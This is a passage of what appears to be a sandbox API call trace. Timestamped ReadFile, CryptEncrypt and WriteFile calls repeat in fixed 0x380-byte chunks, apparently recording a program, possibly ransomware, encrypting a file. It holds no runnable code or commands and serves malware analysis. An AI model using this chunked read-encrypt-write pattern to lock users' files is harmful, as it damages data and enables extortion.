nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.155] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.156] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.156] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.156] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.156] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.156] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.156] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.157] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.157] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.157] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.157] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.157] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.157] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.158] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.158] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.158] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.158] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.158] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.159] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.159] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.159] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.159] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.159] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.159] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.160] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.160] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.161] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.161] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.162] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.162] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.163] WriteFile (in: hFile=0x5d3c, 